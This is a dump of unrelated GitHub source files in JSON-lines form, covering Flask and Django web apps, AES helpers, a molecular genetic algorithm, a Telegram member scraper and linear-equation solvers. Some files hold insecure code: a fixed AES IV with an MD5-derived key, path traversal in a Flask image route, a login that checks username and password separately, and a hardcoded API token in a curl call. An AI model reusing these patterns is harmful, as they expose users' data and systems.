stderr=subprocess.STDOUT, env=os.environ.copy())\n\n elif args.action == 'extract':\n print('Running: {} action.'.format(args.action))\n cmd = ['python', scripts['extract'], '-i', args.dir,\n '-t', args.testcases]\n subprocess.run(cmd, stdout=sys.stdout,\n stderr=subprocess.STDOUT, env=os.environ.copy())\n\n elif args.action == 'plot':\n print('Running: {} action.'.format(args.action))\n cmd = ['python', scripts['plot'], '-i', args.dir,\n '-t', args.testcases] \n subprocess.run(cmd, stdout=sys.stdout,\n stderr=subprocess.STDOUT, env=os.environ.copy())\n","repo_name":"kiliakis/hblond-cf2020-ae","sub_path":"hblond/scripts/driver.py","file_name":"driver.py","file_ext":"py","file_size_in_byte":2416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4257950989","text":"from cryptography.hazmat.primitives import ciphers\nfrom cryptography.hazmat.primitives.ciphers import algorithms, modes\nfrom cryptography.hazmat.backends import default_backend\nfrom cryptography.hazmat.primitives import padding\nimport hashlib\n\n\ndef encrypt(plainText, workingKey):\n iv = b\"\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\\x0b\\x0c\\x0d\\x0e\\x0f\"\n padder = padding.PKCS7(128).padder()\n padded_data = padder.update(plainText.encode()) + padder.finalize()\n\n key = hashlib.md5(workingKey.encode()).digest()\n cipher = ciphers.Cipher(algorithms.AES(key), modes.CBC(iv), default_backend())\n encryptor = cipher.encryptor()\n\n cipherText = encryptor.update(padded_data) + encryptor.finalize()\n return cipherText.hex()\n\n\ndef decrypt(cipherText, workingKey):\n iv = b\"\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\\x0b\\x0c\\x0d\\x0e\\x0f\"\n key = hashlib.md5(workingKey.encode()).digest()\n\n cipher = ciphers.Cipher(algorithms.AES(key), modes.CBC(iv), default_backend())\n decryptor = cipher.decryptor()\n\n encrypted_data = bytes.fromhex(cipherText)\n padded_plainText = decryptor.update(encrypted_data) + decryptor.finalize()\n\n unpadder = padding.PKCS7(128).unpadder()\n plainText = 
unpadder.update(padded_plainText) + unpadder.finalize()\n\n return plainText.decode(\"utf-8\")\n\n\n# Testing\n# workingKey = \"ThisIsAKey123\"\n# plainText = \"Hello, World!\"\n\n# cipherText = encrypt(plainText, workingKey)\n# print(f\"Encrypted: {cipherText}\")\n\n# decrypted_text = decrypt(cipherText, workingKey)\n# print(f\"Decrypted: {decrypted_text}\")\n","repo_name":"Illucious/balajicovers-backend","sub_path":"backend/payments/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74631443665","text":"'''\nWritten by Jan H. Jensen 2018. \nMany subsequent changes inspired by https://github.com/BenevolentAI/guacamol_baselines/tree/master/graph_ga\n'''\n\nfrom rdkit import Chem\nfrom rdkit.Chem import AllChem\nfrom rdkit.Chem import Descriptors\nfrom rdkit.Chem import rdmolops\n\n#from rdkit import rdBase\n#rdBase.DisableLog('rdApp.error')\nfrom rdkit import RDLogger \nRDLogger.DisableLog('rdApp.*')\n\nimport numpy as np\nimport random\nimport time\nimport sys\n\nimport crossover as co\nimport mutate as mu\nimport scoring_functions as sc\n\ndef read_file(file_name):\n mol_list = []\n with open(file_name,'r') as file:\n for smiles in file:\n mol_list.append(Chem.MolFromSmiles(smiles))\n\n return mol_list\n\ndef make_initial_population(population_size,file_name):\n mol_list = read_file(file_name)\n population = []\n for i in range(population_size):\n population.append(random.choice(mol_list))\n \n return population\n\ndef calculate_normalized_fitness(scores):\n sum_scores = sum(scores)\n normalized_fitness = [score/sum_scores for score in scores]\n\n return normalized_fitness\n\ndef make_mating_pool(population,fitness,mating_pool_size):\n mating_pool = []\n for i in range(mating_pool_size):\n \tmating_pool.append(np.random.choice(population, p=fitness))\n\n return mating_pool\n \n\ndef reproduce(mating_pool,population_size,mutation_rate):\n new_population = []\n while len(new_population) < population_size:\n parent_A = random.choice(mating_pool)\n parent_B = random.choice(mating_pool)\n new_child = co.crossover(parent_A,parent_B)\n if new_child != None:\n mutated_child = mu.mutate(new_child,mutation_rate)\n if mutated_child != None:\n #print(','.join([Chem.MolToSmiles(mutated_child),Chem.MolToSmiles(new_child),Chem.MolToSmiles(parent_A),Chem.MolToSmiles(parent_B)]))\n new_population.append(mutated_child)\n\n return new_population\n\ndef sanitize(population,scores,population_size, prune_population):\n if prune_population:\n smiles_list = []\n population_tuples = []\n for score, mol in zip(scores,population):\n smiles = Chem.MolToSmiles(mol)\n smiles = Chem.MolToSmiles(Chem.MolFromSmiles(smiles))\n if smiles not in smiles_list:\n smiles_list.append(smiles)\n population_tuples.append((score,mol))\n else:\n population_tuples = list(zip(scores,population))\n\n population_tuples = sorted(population_tuples, key=lambda x: x[0], reverse=True)[:population_size]\n new_population = [t[1] for t in population_tuples]\n new_scores = [t[0] for t in population_tuples]\n\n return new_population, new_scores\n\ndef GA(args):\n population_size, file_name,scoring_function,generations,mating_pool_size,mutation_rate, \\\n scoring_args, max_score, prune_population, seed = args\n\n np.random.seed(seed)\n random.seed(seed)\n \n high_scores = [] \n population = make_initial_population(population_size,file_name)\n scores = sc.calculate_scores(population,scoring_function,scoring_args)\n 
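# Editorial sketch, not from the original repo: make_mating_pool above implements plain\n    # fitness-proportionate (roulette-wheel) selection. Assuming non-negative scores, the\n    # same draw in one step would be:\n    #   fitness = [s / sum(scores) for s in scores]\n    #   parents = np.random.choice(population, size=2, p=fitness)\n    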
#reorder so best score comes first\n    population, scores = sanitize(population, scores, population_size, False) \n    high_scores.append((scores[0],Chem.MolToSmiles(population[0])))\n    fitness = calculate_normalized_fitness(scores)\n\n    for generation in range(generations):\n        mating_pool = make_mating_pool(population,fitness,mating_pool_size)\n        new_population = reproduce(mating_pool,population_size,mutation_rate)\n        new_scores = sc.calculate_scores(new_population,scoring_function,scoring_args)\n        population, scores = sanitize(population+new_population, scores+new_scores, population_size, prune_population) \n        fitness = calculate_normalized_fitness(scores)\n        high_scores.append((scores[0],Chem.MolToSmiles(population[0])))\n        if scores[0] >= max_score:\n            break\n\n    return (scores, population, high_scores, generation+1)\n\n\nif __name__ == \"__main__\":\n    pass\n","repo_name":"jensengroup/GB_GA","sub_path":"GB_GA.py","file_name":"GB_GA.py","file_ext":"py","file_size_in_byte":3850,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"48"}{"seq_id":"40911334155","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom werkzeug.utils import secure_filename\nfrom flask import Flask, render_template, jsonify, request, make_response, send_from_directory, abort\nimport time\nimport os\nfrom strUtil import Pic_str\nimport base64\nfrom flask_bootstrap import Bootstrap\n# import ansible.runner\n# import commands\n\napp = Flask(__name__)\nbootstrap = Bootstrap(app)\n\nUPLOAD_FOLDER = 'upload'\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\nbasedir = os.path.abspath(os.path.dirname(__file__))\nALLOWED_EXTENSIONS = set(['png', 'jpg', 'JPG', 'PNG', 'gif', 'GIF'])\n\n\ndef allowed_file(filename):\n    return '.' in filename and filename.rsplit('.', 1)[1] in ALLOWED_EXTENSIONS\n    \n    \n# @app.route('/upload')\n# def upload_test():\n#     return render_template('upload_pic.html')\n\n@app.route('/')\ndef upload():\n    return render_template('upload_pic.html')\n\n\n# Upload a file\n@app.route('/up_photo', methods=['POST'], strict_slashes=False)\ndef api_upload():\n    file_dir = os.path.join(basedir, app.config['UPLOAD_FOLDER'])\n    if not os.path.exists(file_dir):\n        os.makedirs(file_dir)\n    f = request.files['photo']\n    if f and allowed_file(f.filename):\n        fname = secure_filename(f.filename)\n        print(fname)\n        ext = fname.rsplit('.', 1)[1]\n        new_filename = Pic_str().create_uuid() + '.' 
+ ext\n        f.save(os.path.join(file_dir, new_filename))\n        # return render_template('upload_pic.html', result=1)\n        #return jsonify({\"success\": 0, \"msg\": \"upload succeeded\"})\n    #else:\n    #    return render_template('upload_pic.html', result=1)\n    #return jsonify({\"error\": 1001, \"msg\": \"upload failed\"})\n    #cmd = 'curl -X POST -H \"ServiceID:uaiservice-ad53msad\" -H \"Token:32f184961bc5d17e10c372ecad40e475\" http://uinference-sh2.ucloud.cn/service -T 2.jpg'\n    cmd=' curl -X POST -H \"ServiceID:uaiservice-zsegqykh\" -H \"Token:5e40cfa614aba43c8f81da595e4d3b20\" http://uinference-sh2.service.ucloud.cn/service -T /data/2.png'\n    msg = os.popen(cmd).read()\n    print(msg)\n    return render_template('upload_pic.html', result=msg.strip())\n\n\n@app.route('/download/<filename>', methods=['GET'])\ndef download(filename):\n    if request.method == \"GET\":\n        if os.path.isfile(os.path.join('upload', filename)):\n            return send_from_directory('upload', filename, as_attachment=True)\n        pass\n\n\n@app.route('/cmd', methods=['GET', 'POST'])\ndef index():\n    if request.method == \"POST\":\n        cmd = request.form.get('cmd', type=str, default=None)\n        ip = request.form.get('ip', type=str, default=None)\n        host_cfg = os.path.join(basedir, 'host.cfg')\n        print(cmd, ip, host_cfg)\n        # 1 or None   None or 1\n        # 1 and None   None or 1\n        # if cmd or ip:\n        # compare the results\n        if cmd and ip:\n            # runner = ansible.runner.Runner(\n            #     host_list=os.path.join(basedir, host_cfg),\n            #     module_name='shell',\n            #     module_args=cmd,\n            #     pattern=ip,\n            #     forks=10\n            # )\n            # datastructure = runner.run()\n            # for key, value in datastructure.items():\n            #     if 'contacted' in key:\n            #         exec_result = value\n            return render_template('upload_pic.html', result=\"test\", ip=ip, cmd=cmd)\n        else:\n            return render_template('upload_pic.html')\n    else:\n        return render_template('upload_pic.html') \n    \n# show photo\n@app.route('/show/<filename>', methods=['GET'])\ndef show_photo(filename):\n    file_dir = os.path.join(basedir, app.config['UPLOAD_FOLDER'])\n    if request.method == 'GET':\n        if filename is None:\n            pass\n        else:\n            image_data = open(os.path.join(file_dir, '%s' % filename), \"rb\").read()\n            response = make_response(image_data)\n            response.headers['Content-Type'] = 'image/png'\n            return response\n    else:\n        pass\n\n    \nif __name__ == '__main__':\n    app.run(debug=True,host='10.24.5.57',port=5000)#'10.24.5.57'","repo_name":"nchen909/flask_mongodb_game","sub_path":"cloudcompflaskex/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4011,"program_lang":"python","lang":"en","doc_type":"code","stars":125,"dataset":"github-code","pt":"48"}{"seq_id":"11432514548","text":"\nheaders = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}\n\ndef get_product_name_by_url(url):\n    from bs4 import BeautifulSoup\n    import requests\n    r = requests.get(url, headers=headers)\n    #print(data)\n    soup = BeautifulSoup(r.content, 'html.parser')\n    s = soup.find(\"meta\", {\"name\": \"keywords\"})\n    product_name = s.get(\"content\").split(',')[0]\n    print(product_name)\n\n    # for tag in soup.find_all(\"meta\"):\n    #     if tag.get(\"name\", None) == \"keywords\":\n    #         print(tag.get(\"content\", None))\n\n    #print(\"YAHOOOooo 
{}\".format(span))\n\nget_product_name_by_url('https://www.amazon.com/Sony-Cancelling-Behind-Neck-Headphones-International/dp/B075XF9VN9')","repo_name":"rrajaravi/ray","sub_path":"ray/ray_scrapy/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5783498475","text":"import subprocess\nfrom collections import defaultdict\n\nimport numpy as np\nfrom Bio import Seq, SeqIO\n\n# load extant msa\nmsa_one = list(\n SeqIO.parse(\"MSA/fullheaders_globin_pfam_2022_filtered20pct.afa\", \"fasta\")\n)\nmsa_two = list(\n SeqIO.parse(\"MSA/top_fullheaders_desaturase_pfam_2022_filt20.afa\", \"fasta\")\n)\n\n# get TaxID for sequences\nheaders_msa_one = list()\nheaders_msa_two = list()\nfor sequence in msa_one:\n try:\n headers_msa_one.append(sequence.description.split(\"OX=\")[1].split()[0])\n except:\n headers_msa_one.append(\n \"-1\"\n ) # will never intersect with msa_two; no info in seq\n\nfor sequence in msa_two:\n try:\n headers_msa_two.append(sequence.description.split(\"OX=\")[1].split()[0])\n except:\n headers_msa_two.append(\n \"-2\"\n ) # will never intersect with msa_one; no info in seq\n\n# get list of taxid overlap (we can pair these successfully)\nintersect_set = set(headers_msa_one).intersection(headers_msa_two)\n\n# make key:value pair to link a header to a position in the msa\nmsa_one_dict = defaultdict(list)\nmsa_two_dict = defaultdict(list)\nfor idx, header in enumerate(headers_msa_one):\n if header in intersect_set:\n msa_one_dict[header].append(idx)\nfor idx, header in enumerate(headers_msa_two):\n if header in intersect_set:\n msa_two_dict[header].append(idx)\n\n\n# append taxid to the front of the header, so the\n# TreeDist package can compare taxid locations between the two trees\nfor label, sequence in zip(headers_msa_one, msa_one):\n sequence.id = label + \" - \" + sequence.id\nfor label, sequence in zip(headers_msa_two, msa_two):\n sequence.id = label + \" - \" + sequence.id\n\n# generate msa!\nfor i in range(100):\n header_choice = np.random.choice(list(intersect_set), 640, replace=False)\n sampled_msa_one = [\n msa_one[np.random.choice(msa_one_dict[header])] for header in header_choice\n ]\n sampled_msa_two = [\n msa_two[np.random.choice(msa_two_dict[header])] for header in header_choice\n ]\n SeqIO.write(\n sampled_msa_one, \"globin_msa/sampled_fasta_\" + str(i + 1) + \".fasta\", \"fasta\"\n )\n SeqIO.write(\n sampled_msa_two,\n \"desaturase_msa/sampled_fasta_\" + str(i + 1) + \".fasta\",\n \"fasta\",\n )\n\n# create trees!\nfor i in range(100):\n tree_one = \"globin_trees/sampled_fasta_\" + str(i + 1) + \".tree\"\n tree_two = \"desaturase_trees/sampled_fasta_\" + str(i + 1) + \".tree\"\n fasta_one = \"globin_msa/sampled_fasta_\" + str(i + 1) + \".fasta\"\n fasta_two = \"desaturase_msa/sampled_fasta_\" + str(i + 1) + \".fasta\"\n command_one = [\"./FastTree\", \"-out\", tree_one, fasta_one]\n command_two = [\"./FastTree\", \"-out\", tree_two, fasta_two]\n subprocess.run(command_one)\n subprocess.run(command_two)\n\n# clustering distance is computed in R script.\n","repo_name":"morcoslab/LGL-VAE","sub_path":"scripts/generate_interfamily_comparison_trees.py","file_name":"generate_interfamily_comparison_trees.py","file_ext":"py","file_size_in_byte":2827,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"8206846845","text":"from classes.shared import db\nfrom classes import notifications, 
Sec\n\n\ndef sendMessage(subject, message, fromUser, toUser):\n newMessage = notifications.userMessage(subject, message, fromUser, toUser)\n db.session.add(newMessage)\n db.session.commit()\n return newMessage.messageID\n\n\ndef sendNotification(message, link, image, toUserID):\n newNotification = notifications.userNotification(message, link, image, toUserID)\n db.session.add(newNotification)\n db.session.commit()\n return newNotification.notificationID\n\n\ndef sendAdminNotification(message, link, image):\n adminList = []\n userQuery = Sec.User.query.all()\n for user in userQuery:\n if user.has_role(\"Admin\"):\n adminList.append(user)\n notificationArray = []\n for admin in adminList:\n notificationID = sendNotification(message, link, image, admin.id)\n notificationArray.append(notificationID)\n db.session.commit()\n return notificationArray\n","repo_name":"Open-Streaming-Platform/open-streaming-platform","sub_path":"functions/notifications.py","file_name":"notifications.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"48"} +{"seq_id":"70139571667","text":"from django.shortcuts import render\n\nfrom django.http import JsonResponse\nfrom django.http import HttpResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.db import models\nfrom django import forms\nfrom .models import Users\nfrom .models import raport\nfrom .models import UserSession\nfrom django.shortcuts import render\nfrom .weather import general_alert\nimport string\nimport random\n\n\nclass UserForm(forms.ModelForm):\n class Meta:\n model = Users\n fields = ['user_id','username','password']\n\nclass newSession(forms.ModelForm):\n class Meta:\n model = UserSession\n fields = ['session_id','user_id']\n\nclass newData(forms.ModelForm):\n class Meta:\n model = raport\n fields = ['report_id','user_id','lat','lng','strada','path_to_Photo','description'] \n\ndef get_random_string(length):\n # choose from all lowercase letter\n letters = string.ascii_letters + string.digits + string.punctuation\n result_str = ''.join(random.choice(letters) for i in range(length))\n return result_str\n\n\n\n\n@csrf_exempt\ndef rep_post(request):\n if(request.method=='POST'):\n newId=Users.objects.count()+1\n form = UserForm(request.POST)\n data = form.data.copy()\n data['user_id']=newId\n form.data=data\n if form.is_valid():\n print(form.data)\n form.save()\n \n else:\n print(\"Not Valid\")\n \n \n return JsonResponse({'message': 'done'})\n else:\n print(\"Not Working\")\n return HttpResponse(\"Nothing Here\")\n\n@csrf_exempt\ndef user_post(request):\n if(request.method=='POST'):\n form = newData(request.POST)\n newId = raport.objects.count()+1\n data = form.data.copy()\n data['report_id']=newId\n print(data)\n form.data=data\n if form.is_valid():\n print(form.data)\n form.save()\n \n return JsonResponse({'message': 'done'})\n else:\n print(\"Not Working\")\n return HttpResponse(\"Nothing Here\")\n\n\n@csrf_exempt\ndef log_usr(request):\n if(request.method=='POST'):\n form = UserForm(request.POST)\n check1=Users.objects.filter(username=form.data['username']).exists()\n check2=Users.objects.filter(password=form.data['password']).exists()\n if check1 and check2:\n session_id = get_random_string(42)\n fk_id = Users.objects.filter(username=form.data['username']).first() \n sessionForm = newSession()\n new_session = sessionForm.save(commit=False)\n new_session.session_id=session_id\n new_session.user_id=fk_id.user_id\n print(new_session)\n 
new_session.save()\n \n return JsonResponse({'value':{'session_id':session_id,'user_id':fk_id.user_id},'name':'session_id','status':200})\n\n else:\n return JsonResponse({'message': 'not Valid'})\n\n else:\n print(\"Not Working\")\n return HttpResponse(\"Nothing Here\")\n\n@csrf_exempt\ndef view_app(request):\n return render(request,\"locatie.html\")\n\n@csrf_exempt\ndef view_finalizare(request):\n element=raport.objects.latest('report_id')\n general_alert(element.strada,element.lat,element.lng)\n \n print(element.lat)\n return render(request,\"finalizare.html\")\n \n@csrf_exempt\ndef get_data(request):\n arr=[]\n for obj in raport.objects.all():\n arr.append({obj.strada,obj.lat,obj.lng,obj.description})\n print(arr)\n return arr\n\n","repo_name":"TRBogdann/Hackathon","sub_path":"server/raport/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"189059679","text":"import copy\nimport math\nimport time\n\n\nclass MatrixProject:\n\n # N = 9cd\n # e - 4 cyfra nr indeksu\n # f - 3 cyfra nr indeksu\n # c - przedostatnia cyfra nr indeksu\n # d - ostatnia cyfra nr indeksu\n # indeks: 184589 -> N = 989\n def __init__(self, indexNumber):\n self.c = indexNumber % 100 // 10\n self.d = indexNumber % 10\n self.e = indexNumber % 1000 // 100\n self.f = indexNumber % 10_000 // 1000\n self.N = 9 * 100 + self.c * 10 + self.d * 1\n self.matrix = [[0 for x in range(self.N)] for y in range(self.N)]\n self.b = [0 for x in range(self.N)]\n self.time_jacobi = []\n self.time_gauss_seidel = []\n self.time_LU_factorization = []\n self.iterations_jacobi = []\n self.iterations_gauss_seidel = []\n self.iterations_LU_factorization = []\n self.jacobi_residual = []\n self.gauss_seidel_residual = []\n self.LU_factorization_residual = []\n\n def createVectorB(self):\n for j in range(self.N):\n n = math.sin(j * (self.f + 1))\n self.b[j] = n\n\n def createBandMatrix(self, a1, a2, a3):\n\n for i in range(self.N):\n if i < len(self.matrix) - 1:\n # 1th lower diagonal\n self.matrix[i + 1][i] = a2\n # 2nd lower diagonal\n if i < self.N - 2:\n self.matrix[i + 2][i] = a3\n\n if i > 0:\n # 1th upper diagonal\n self.matrix[i - 1][i] = a2\n # 2nd upper diagonal\n if i > 1:\n self.matrix[i - 2][i] = a3\n # main diagonal\n for j in range(self.N):\n if i == j:\n self.matrix[i][j] = a1\n\n def createBandSizeMatrix(self, a1, a2, a3, N):\n self.N = N\n self.matrix = [[0 for x in range(self.N)] for y in range(self.N)]\n self.b = [0 for x in range(self.N)]\n self.createVectorB()\n for i in range(self.N):\n if i < len(self.matrix) - 1:\n # 1th lower diagonal\n self.matrix[i + 1][i] = a2\n # 2nd lower diagonal\n if i < self.N - 2:\n self.matrix[i + 2][i] = a3\n\n if i > 0:\n # 1th upper diagonal\n self.matrix[i - 1][i] = a2\n # 2nd upper diagonal\n if i > 1:\n self.matrix[i - 2][i] = a3\n # main diagonal\n for j in range(self.N):\n if i == j:\n self.matrix[i][j] = a1\n\n @staticmethod\n def multiplyMatrixVector(matrix1, vector):\n # can't multiply matrix with different size\n if len(matrix1) != len(vector):\n return 0\n newVector = [0 for x in range(len(matrix1))]\n for i in range(len(newVector)):\n for j in range(len(newVector)):\n newVector[i] += matrix1[i][j] * vector[j]\n return newVector\n\n def calc_residual(self, matrix, r, b):\n newVector = self.multiplyMatrixVector(matrix, r)\n for i in range(len(newVector)):\n newVector[i] -= b[i]\n return newVector\n\n def jacobi_method(self):\n r = [1 for x in 
range(len(self.matrix))]\n        r_prev = copy.deepcopy(r)\n        norm_res = self.norm(self.calc_residual(self.matrix, r, self.b))\n\n        iteration = 0\n        val = 10 ** (-9)\n        residual = []\n        start = time.time()\n        while val < norm_res < 10e9:\n            residual.append(norm_res)\n            for i in range(len(r)):\n                tmp_sum = 0\n                for j in range(len(r)):\n                    if i != j:\n                        tmp_sum += self.matrix[i][j]*r_prev[j]\n                r[i] = (self.b[i] - tmp_sum)/self.matrix[i][i]\n            r_prev = copy.deepcopy(r)\n            iteration += 1\n            norm_res = self.norm(self.calc_residual(self.matrix, r, self.b))\n        end = time.time()\n        timeString = str(end - start) + \" [s]\"\n        normBiggerThan = \"Bigger than \" + str(norm_res)\n        self.time_jacobi.append(end-start)\n        self.iterations_jacobi.append(iteration)\n        self.jacobi_residual.append(residual)\n        print(f\"|=============== Jacobi Method ===============|\")\n        print(f\"|-> Time: {timeString}\")\n        print(f\"|-> Iteration: {iteration}\")\n        print(f\"|-> Residuum: {norm_res if (norm_res < 10e9) else normBiggerThan}\")\n\n    def gauss_method(self):\n        r = [1 for x in range(len(self.matrix))]\n        r_prev = copy.deepcopy(r)\n        norm_res = self.norm(self.calc_residual(self.matrix, r, self.b))\n\n        iteration = 0\n        val = 10 ** (-9)\n\n        start = time.time()\n        residual = []\n        while val < norm_res < 10e9:\n            residual.append(norm_res)\n            for i in range(len(r)):\n                tmp1 = 0\n                tmp2 = 0\n                for j in range(len(r)):\n                    if i > j:\n                        tmp1 += self.matrix[i][j] * r[j]\n                    if j > i:\n                        tmp2 += self.matrix[i][j] * r_prev[j]\n                r[i] = (self.b[i] - tmp1 - tmp2) / self.matrix[i][i]\n            r_prev = copy.deepcopy(r)\n            iteration += 1\n            norm_res = self.norm(self.calc_residual(self.matrix, r, self.b))\n        end = time.time()\n        timeString = str(end - start) + \" [s]\"\n        normBiggerThan = \"Bigger than \" + str(norm_res)\n        self.time_gauss_seidel.append(end-start)\n        self.iterations_gauss_seidel.append(iteration)\n        self.gauss_seidel_residual.append(residual)\n        print(f\"|=============== Gauss-Seidel Method ===============|\")\n        print(f\"|-> Time: {timeString}\")\n        print(f\"|-> Iteration: {iteration}\")\n        print(f\"|-> Residuum: {norm_res if (norm_res < 10e9) else normBiggerThan}\")\n\n    def LU_factorization(self):\n        start = time.time()\n\n        U, L = create_LU(self.matrix, self.N)\n\n        # forward substitution\n        y = [0 for y in range(len(U))]\n        for i in range(len(y)):\n            tmp = 0\n            for k in range(i):\n                tmp += L[i][k] * y[k]\n            y[i] = (self.b[i] - tmp)/L[i][i]\n\n        for i in y:\n            print(i, end=\" \")\n        print()\n\n        # back substitution\n        x = [0 for x in range(len(U))]\n        for i in reversed(range(len(x))):\n            tmp = 0\n            for k in range(i+1, len(x)):\n                tmp = tmp + U[i][k]*x[k]\n            x[i] = (y[i] - tmp)/U[i][i]\n        end = time.time()\n\n        for i in x:\n            print(i, end=\" \")\n        print()\n        timeString = str(end - start) + \" [s]\"\n\n        norm_res = self.norm(self.calc_residual(self.matrix, x, self.b))\n        self.time_LU_factorization.append(end-start)\n        self.LU_factorization_residual.append(norm_res)\n        print(f\"|=============== LU Factorization ===============|\")\n        print(f\"|-> Time: {timeString}\")\n        print(f\"|-> Residuum: {norm_res}\")\n\n    @staticmethod\n    def norm(vector):\n        norm_res = 0\n        for i in range(len(vector)):\n            norm_res += vector[i] ** 2\n        return math.sqrt(norm_res)\n\n    @staticmethod\n    def printMatrix(matrix):\n        for i in range(len(matrix)):\n            print(\"[\", end=\"\\t\")\n            for j in range(len(matrix[i])):\n                print(str(matrix[i][j]), end=\"\\t\\t\")\n            print(\"]\")\n\n\ndef create_LU(matrix, N):\n    U = copy.deepcopy(matrix)\n    L = create_unit_matrix(N)\n    for k in range(N - 1):\n        for j in range(k + 
1, N):\n L[j][k] = U[j][k] / U[k][k]\n for m in range(k, N):\n U[j][m] -= L[j][k] * U[k][m]\n return U, L\n\n\ndef create_unit_matrix(N):\n unit = [[0 for x in range(N)] for y in range(N)]\n for i in range(N):\n unit[i][i] = 1.0\n return unit","repo_name":"Krystian030/Numerical-Methods","sub_path":"Projects/System_of_linear_equations/MatrixProject.py","file_name":"MatrixProject.py","file_ext":"py","file_size_in_byte":7883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24832125469","text":"\n# 获取telegram 群成员数据的程序入口\n\n\nfrom configparser import ConfigParser\nfrom src.TelegramChannelMemberExtractor import TGMemExtrator\n\ncfg = ConfigParser()\ncfg.read('./config/telegram_extractor.ini', encoding='utf-8')\nconfig = {\n 'TG_session_name': cfg.get('login_setting', 'TG_session_name'),\n 'TG_api_id': int(cfg.get('login_setting', 'TG_api_id')),\n 'TG_api_hash': cfg.get('login_setting', 'TG_api_hash'),\n 'proxy_address': cfg.get('login_setting', 'proxy_address'),\n 'proxy_port': int(cfg.get('login_setting', 'proxy_port')),\n 'group_member': cfg.get('download_addr', 'group_member'),\n 'group_avatar': cfg.get('download_addr', 'group_avatar')\n}\n\n\ndef extractor_get_member(username):\n tgMemExtrator = TGMemExtrator(config)\n\n flag = False\n tgMemExtrator.set_channel(username)\n tgMemExtrator.dumpTojson(flag)\n\n\ndef main():\n username = 'Advancedchat'\n extractor_get_member(username)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"wschxida/test","sub_path":"telegram/get_member.py","file_name":"get_member.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36613959692","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # 题目\n# \n# ### 在字符串中找出第一个只出现一次的字符。如输入“abaccdeff”,则输出“b”。\n\n# In[8]:\n\n\n'''\n思路:\n\n我们可以定义哈希表,哈希表的键值是字符,而值是该字符出现的次数。同时我们还需要从头开始扫描字符串两次,第一次扫描字符串时,每扫描到一个字符,就在哈希表的对应项中把次数加1.接下来第二次扫描时,每扫描到一个字符就能从哈希表得到该字符出现的次数。这样,第一个只出现一次的字符就是符合要求的输出\n'''\ndef FirstNotRepeatingChar(pString):\n if not pString:\n return None\n hashTable=[0]*256\n for i in pString:\n hashTable[ord(i)]+=1\n for i in pString:\n if hashTable[ord(i)]==1:\n return i\n break\n return None\n\nFirstNotRepeatingChar(\"googlle\")\n\n\n# In[10]:\n\n\n'''\n纯Python的代码\n'''\ndef FirstNotRepeatingChar(pString):\n if not pString:\n return None\n for i in pString:\n if pString.count(i)==1:\n return i\n return None\n\nFirstNotRepeatingChar(\"googlle\")\n\n\n# In[11]:\n\n\n'''\n更精简的一行代码\n'''\ndef FirstNotRepearingChar(pString):\n return pString.index(list(filter(lambda c:pString.count(c)==1,pString))[0]) if pString else -1\n\nFirstNotRepeatingChar(\"googlle\")\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"BHRY1314/offer_python","sub_path":"面试题50:第一个只出现一次的字符.py","file_name":"面试题50:第一个只出现一次的字符.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"2347295245","text":"from flask import Flask, url_for, render_template, redirect\nfrom forms import PredictForm\nfrom flask import request, sessions\nimport requests\nfrom flask import json\nfrom flask import jsonify\nfrom flask import Request\nfrom flask import Response\nimport urllib3\nimport json\n# from flask_wtf import FlaskForm\n\napp = Flask(__name__, instance_relative_config=False)\napp.config[\"TEMPLATES_AUTO_RELOAD\"] = True\napp.secret_key = 'development key' #you will need a secret key\n\nif __name__ == \"__main__\":\n 
app.run(debug=True, host='0.0.0.0')\n\n@app.route('/', methods=('GET', 'POST'))\n\ndef startApp():\n form = PredictForm()\n return render_template('index.html', form=form)\n\n@app.route('/predict', methods=('GET', 'POST'))\ndef predict():\n form = PredictForm()\n if form.submit():\n\n API_KEY = \"\" #Select Account > Users, go to Manage > Access (IAM) > API keys.\n token_response = requests.post('https://iam.cloud.ibm.com/identity/token', data={\"apikey\": API_KEY, \"grant_type\": 'urn:ibm:params:oauth:grant-type:apikey'})\n mltoken = token_response.json()[\"access_token\"]\n\n header = {'Content-Type': 'application/json', 'Authorization': 'Bearer ' + mltoken}\n\n if( form.case.data == None and form.symptoms_start_date.data == None and form.diagnosys_date.data == None and \n form.city.data == None and form.locality.data == None and form.age.data == None and form.age_unit.data == None and form.sex.data == None and \n form.contagion_type.data == None and form.current_location.data == None ): \n python_object = []\n else:\n python_object = [form.case.data, form.symptoms_start_date.data, form.diagnosys_date.data,\n form.city.data, form.locality.data, form.age.data, form.age_unit.data, form.sex.data,\n form.contagion_type.data, form.current_location.data ]\n #Transform python objects to Json\n\n userInput = []\n userInput.append(python_object)\n\n # NOTE: manually define and pass 